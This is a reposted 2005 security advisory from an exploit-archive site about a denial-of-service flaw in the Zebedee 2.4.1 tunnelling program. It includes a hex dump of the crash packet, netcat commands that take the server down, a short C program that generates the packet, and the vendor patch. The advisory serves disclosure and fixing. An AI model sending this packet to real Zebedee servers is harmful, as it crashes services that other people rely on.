首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zebedee DoS
来源:www.vfocus.net 作者:Shiraishi.M 发布时间:2005-09-14  

Zebedee DoS

Summary
"Zebedee is a simple program to establish an encrypted, compressed tunnel for TCP/IP or UDP data transfer between two systems." Lack of proper validation of the user provided port range allows attackers to cause the Zebedee program to crash.

Credit:
The information has been provided by Shiraishi.M.

Details
Vulnerable Systems:
* Zebedee version 2.4.1

Immune Systems:
* Zebedee version 2.4.1a

The server crashes whenever "0" received as the port number in the protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c

The 9th and 10th byte of the header contains 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
sent 0, rcvd 0

$

In the zebedee.c, look at the function makeConnection() which called from server(),

1703 /* Sanity check */
1704
1705 assert(host != NULL && port != 0);
1706

Here, if the port number is "0", both sub and parent processes seemed to quit running.

This issue occurs when the "allowed redirection port" not set(in default).

Vendor Patch:
*** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
--- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
***************
*** 22,28 ****
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1"

#include <stdio.h>
#include <stdlib.h>
--- 22,28 ----
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1A"

#include <stdio.h>
#include <stdlib.h>
***************
*** 3936,3941 ****
--- 3936,3950 ----
assert(AllowedTargets != NULL);

/*
+ ** Port 0 is invalid data in the request packet, never allowed
+ */
+ if (port == 0)
+ {
+ message(0, 0, "request for target port 0 disallowed");
+ return 0;
+ }
+
+ /*
** If the address is all zeroes then we will assume the default target
** host, if any.
*/

Workaround:
Setting up allowed redirection ports will address this issue.

Exploit:
/*
$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
$ ./mkZebedeeDoS > zebedeeDoS
$ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{
int i, size;

char data[] = {
0x02, 0x01, // protocol version
0x00, 0x00, // flags
0x20, 0x00, // max message size
0x00, 0x06, // compression info
0x00, 0x00, // port request: value = 0x0
0x00, 0x80, // key length
0xff, 0xff, 0xff, 0xff, // key token
0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
0x00, 0x00, 0x00, 0x00 // target host address
};

size = 28;
for(i=0; i<size; i++){
printf("%c", data[i]);
}

return 0;

}

/* EoF */



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mercury Mail Multiple Buffer O
·Counter Strike 2D DoS
·Windows XP Firewall Bypassing
·VisualBoy Advanced Local Buffe
·COOL! Remote Control DoS
·BNBT EasyTracker DoS
·Snort <= 2.4.0 SACK TCP Opt
·CuteNews Code Execution
·Raxnet Cacti graph_image.php R
·Mozilla Suite - Firefox - Nets
·GNU Mailutils imap4d search Co
·GNU Mailutils imap4d search Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved